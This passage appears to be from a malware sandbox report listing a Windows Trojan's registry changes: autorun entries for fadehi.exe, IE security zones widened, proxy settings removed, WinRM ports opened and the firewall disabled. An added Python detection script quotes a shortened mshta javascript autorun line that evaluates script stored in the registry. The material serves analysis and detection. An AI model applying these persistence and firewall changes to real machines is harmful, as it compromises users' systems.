"LYadYVJLPJ6WFfkaGJmh1WqO=90dkhY45AlhE0gMXxkNmqXwE8e2txGDSBsQMhqnNDOde3U7APQ2AdzFaFQyAjcWRkMGtNkEinSrCp9WEJNa7mP3KdBAcqeouzXMuRbzg99c;PlJgsEhUsHCleD6ghacNrUC=S3L11WmVIXP5YjCibX0UhQDUuLZbmZaMWqkeI2vZev7xCrBSnKue;SeKSu6wcaioFvLSwT3jIuPkz=x1BSabs3aKbNrsKO4v3nrWjVGLHZciGKw89gNSBGTBBHsJsx53bTvqNFyHp4CVCQnInJGCzeEpc9ZHSG;fZAEAKboFDB25oUyYzMQrGMFM=k6s2nq55NWdxAmzlsPornZgTYWNhitD8b9zxSACaPLgO6mE0bsuNBgiInfNMbL0squyGNMEqnbuEs2nT8HqHtlYYPaLnBU1KowDo8vcu3;zLZkci9uF0HlfZQJIeFVSi=F7Nsr9WmKoz44DK4qikwPA5kJqVXfPDTrAfrv2mSRfEjj3hLSb8KZE7tzaqNP6PFuU9DAw;G4pjOlwUamMdAQLhlJz=SlRjoYB5xvr4BkB8nPlXmHhtHRBMxCsSSs9JehH7PQQ3V;XIiOntCrABujiSqWQ3w=rFcHYIJYtMQDxtZ22uBbpL2jQhUJ2EnpdpeQ3G;kowKgLTtT6IMWApdSHika=JJj0qxRd0hjt5wx5b298ADjcNYZtwMruR8EAUTYflkEZKJF2ehzgpB4s7Y2dAQcJ3DkhI79Dd1r6Xra89BjP4eqU73Klo42I4YfR0d5xBkwn0MBIjKijHAhRZwLSzW5;oPLZpDtij9TZchaPfTkpADOw=9KJwm6xKi1wrFiYP3nXhozkCxVnIZ03VBZL04i6b7rmihZEFf8OsRncdKM6Kmq6cyZt5FkiWaxhchVPoTTiW5RUMmxzgnMRan6XudDZYJI1AKyKPkmQhEN0wpyPD7uEk3Qda;qZj1=2B083C3F6D760F02321317631."
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"

[HKCU\Software\e307dfcb0a]
"f4ea4294" = "865"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\e307dfcb0a]
"5119f545" = "LYadYVJLPJ6WFfkaGJmh1WqO=90dkhY45AlhE0gMXxkNmqXwE8e2txGDSBsQMhqnNDOde3U7APQ2AdzFaFQyAjcWRkMGtNkEinSrCp9WEJNa7mP3KdBAcqeouzXMuRbzg99c;PlJgsEhUsHCleD6ghacNrUC=S3L11WmVIXP5YjCibX0UhQDUuLZbmZaMWqkeI2vZev7xCrBSnKue;SeKSu6wcaioFvLSwT3jIuPkz=x1BSabs3aKbNrsKO4v3nrWjVGLHZciGKw89gNSBGTBBHsJsx53bTvqNFyHp4CVCQnInJGCzeEpc9ZHSG;fZAEAKboFDB25oUyYzMQrGMFM=k6s2nq55NWdxAmzlsPornZgTYWNhitD8b9zxSACaPLgO6mE0bsuNBgiInfNMbL0squyGNMEqnbuEs2nT8HqHtlYYPaLnBU1KowDo8vcu3;zLZkci9uF0HlfZQJIeFVSi=F7Nsr9WmKoz44DK4qikwPA5kJqVXfPDTrAfrv2mSRfEjj3hLSb8KZE7tzaqNP6PFuU9DAw;G4pjOlwUamMdAQLhlJz=SlRjoYB5xvr4BkB8nPlXmHhtHRBMxCsSSs9JehH7PQQ3V;XIiOntCrABujiSqWQ3w=rFcHYIJYtMQDxtZ22uBbpL2jQhUJ2EnpdpeQ3G;kowKgLTtT6IMWApdSHika=JJj0qxRd0hjt5wx5b298ADjcNYZtwMruR8EAUTYflkEZKJF2ehzgpB4s7Y2dAQcJ3DkhI79Dd1r6Xra89BjP4eqU73Klo42I4YfR0d5xBkwn0MBIjKijHAhRZwLSzW5;oPLZpDtij9TZchaPfTkpADOw=9KJwm6xKi1wrFiYP3nXhozkCxVnIZ03VBZL04i6b7rmihZEFf8OsRncdKM6Kmq6cyZt5FkiWaxhchVPoTTiW5RUMmxzgnMRan6XudDZYJI1AKyKPkmQhEN0wpyPD7uEk3Qda;qZj1=2B083C3F6D760F02321317631."
"0494a3ce" = "1442757180"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 F0 14 C2 8F EA B5 14 E4 A6 53 3C BD 8F 71 BD"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\e307dfcb0a]
"5232108f" = "ÈwûFª2°p~,¤eÅ’@Èú×¼H«€â’™å- î¬l«•ðøïw·(¿é燧,ÂK<ÃŽ«8GÝt9mFù„zËœ-ßô‚]ꨧÖ×mà`fhêç‡/«hܰremIèÑyDÈ6 ˆŸG”ô?1ËœußXV@@¿°2iVT©Ðãà¯ÉÛ)ŠÕ9NÅ“J:4Ã’Å m¸¾ ¢7G¯Åü•ÇÌM¦M\‰õÌgPshŒäùgi5&”š®Ø©(;°REø¸[>œ–.kZnv)8iÕBû.V±38U‚H- ÕøGÝ¡=ž=B±‡uÕµyáC91wo{¢Aû8oò¨Æ’@‹^×Ádð2žë~GU¹ÿš@Čլ7fQ0.,ˆ|ÃûЦYÙ]½oes¶‹´"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"

[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "6C198210E7D1FFE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\e307dfcb0a]
"52b1e748" = "6C198210E7D1FFE5"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1442757180"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

To run itself automatically each time the user logs on, the Trojan adds the following reference to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe."

The Trojan modifies IE security-zone settings so that UNC paths and dotless local host names not assigned to any other zone are mapped to the Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all sites not listed in any other zone are treated as Intranet zone sites:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To run itself automatically each time the user logs on, the Trojan adds the following reference to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe "

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

The Trojan disables automatic startup of the application by deleting autorun value(s) under the following keys (the value names are not shown in this listing):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

The process regsvr32.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 D2 64 B9 07 33 33 10 81 22 6C 05 95 05 A8 AE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\BC91AD57E73BCB11448]
"D43673142A7803D5E" = "D43673142A7803D5E"

[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
"DEF5A832C6F4203B2" = "DEF5A832C6F4203B2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The Trojan modifies IE security-zone settings so that UNC paths and dotless local host names not assigned to any other zone are mapped to the Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all sites not listed in any other zone are treated as Intranet zone sites:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
[HKLM\SOFTWARE\BC91AD57E73BCB11448]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
"DEF5A832C6F4203B2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\BC91AD57E73BCB11448]
"D43673142A7803D5E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

The process regsvr32.exe:3200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 9B 33 0E AA E1 AE 01 AB AA 92 34 F2 AD DA 66"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process wsmanhttpconfig.exe:3232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 74 09 EA 1C 03 27 B8 EF A7 47 AA A5 7F 1C 7E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process wsmanhttpconfig.exe:1960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 70 27 85 1A FF 0E 1F 70 1A 1D 36 51 E7 59 47"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http://+:47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https://+:5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "D43F50A7-7CCC-43E7-9E47-8D49C8B4D82A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http://+:5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process netsh.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 2B BC DB F3 4F AE E6 9B E1 BF C4 D2 AC D2 EC"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The Windows Firewall is disabled for the standard profile:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
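The registry changes above are easier to act on as detection rules than as a raw listing. The following is an added example, not part of the Lavasoft report and not code from the analysed sample: a small Python triage script that parses this report's own "[key]" / "name" = "value" layout and flags the behaviours this sample shows, namely the mshta javascript: autorun that eval()s a script read back from the registry, a Run entry pointing into the user's profile (fadehi.exe), the IE ZoneMap widening, a FEATURE_BROWSER_EMULATION entry for a non-browser process (regsvr32.exe), and the firewall being disabled while the WinRM ports are opened. The SAMPLE_LISTING it runs on is constructed from entries in this report (the mshta value is shortened and the user name replaced by a placeholder); the rule names and severities are the example's own choices, and a CryptoAPI RNG Seed entry is included to show that ordinary noise produces no finding.

```python
"""Triage rules for a registry-change listing in the layout used above.

Added example for this page; not part of the Lavasoft report and not code
from the analysed sample. Rule names and severities are this example's own.
"""
import re
import sys
from dataclasses import dataclass

# Constructed sample: entries copied from the listing above, with the mshta
# value shortened and the user name replaced by a placeholder.
SAMPLE_LISTING = r'''
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:r49L=new ActiveXObject(WScript.Shell);I2tCE2=r49L.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);eval(I2tCE2);"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\user\local settings\application data\fadehi\fadehi.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"IntranetName" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
"iexplore.exe" = "8888"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 27 1B FE ED E6 AE 9E E4 D6 4F B9 AA 92 DA 70"
'''


@dataclass(frozen=True)
class Finding:
    severity: str
    rule: str
    key: str
    name: str
    value: str


KEY_RE = re.compile(r'^\[(.+)\]$')
NAMED_RE = re.compile(r'^"(.*?)"\s*=\s*"(.*)"$')
BARE_RE = re.compile(r'^"(.*)"$')

# Script hosts and inline-script markers that together mean "code in a value".
SCRIPT_HOSTS = re.compile(r'\b(mshta|wscript|cscript|rundll32|regsvr32|powershell)\b', re.I)
INLINE_SCRIPT = re.compile(r'javascript:|vbscript:|\beval\(|\.RegRead\(|ActiveXObject', re.I)
# Profile directories a non-admin user can write to (Windows XP layout).
USER_WRITABLE = re.compile(r'\\(application data|local settings|temp|appdata)\\', re.I)
BROWSER_HOSTS = {"iexplore.exe", "explorer.exe"}
ZONEMAP_WIDENERS = {"UNCAsIntranet", "IntranetName", "ProxyBypass"}


def parse_listing(text):
    """Yield (key, name, value) triples from the report layout.

    A bracketed line starts a new key; `"name" = "value"` lines belong to it.
    A bare `"value"` line (how the report prints Run entries without a value
    name) is returned with an empty name.
    """
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        if key is None:
            continue
        m = NAMED_RE.match(line)
        if m:
            yield key, m.group(1), m.group(2)
            continue
        m = BARE_RE.match(line)
        if m:
            yield key, "", m.group(1)


def triage(text):
    """Apply the rules to every entry and return the findings in listing order."""
    findings = []
    for key, name, value in parse_listing(text):
        k = key.lower()
        blob = f"{name} {value}"
        if k.endswith("\\run") or k.endswith("\\runonce"):
            # Script host plus inline script/eval in an autorun entry: the
            # payload lives in the registry, not in a file on disk.
            if SCRIPT_HOSTS.search(blob) and INLINE_SCRIPT.search(blob):
                findings.append(Finding("high", "autorun-inline-script", key, name, value))
            # Autorun target under a user-writable profile directory.
            elif USER_WRITABLE.search(blob):
                findings.append(Finding("high", "autorun-user-writable-path", key, name, value))
        elif k.endswith("\\zonemap") and name in ZONEMAP_WIDENERS and value == "1":
            findings.append(Finding("medium", "ie-intranet-zone-widened", key, name, value))
        elif k.endswith("\\feature_browser_emulation") and name.lower() not in BROWSER_HOSTS:
            # A non-browser process registering a document mode hosts the
            # WebBrowser control itself (here regsvr32.exe).
            findings.append(Finding("medium", "browser-control-in-non-browser", key, name, value))
        elif "\\firewallpolicy\\" in k:
            if name == "EnableFirewall" and value == "0":
                findings.append(Finding("high", "firewall-disabled", key, name, value))
            elif k.endswith("\\globallyopenports\\list"):
                findings.append(Finding("medium", "firewall-port-opened", key, name, value))
    return findings


def severity_counts(findings):
    """Return {severity: count} for a quick verdict line."""
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


if __name__ == "__main__":
    # Usage: python triage.py [saved_listing.txt]; defaults to the sample.
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LISTING
    for f in triage(text):
        print(f"[{f.severity}] {f.rule}: {f.key} -> {f.name or '(no name)'} = {f.value[:80]}")
```

Run against a saved copy of this listing the Fusion native-image index, tracing and RNG Seed entries fall through every rule, which is the intended behaviour: they are ordinary Windows activity and only the autorun, zone, browser-emulation and firewall entries are worth an analyst's time.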

The process bindata865.exe:3088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 0A 06 0C F8 80 1C B1 1C 78 63 AA 64 40 B3 92"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

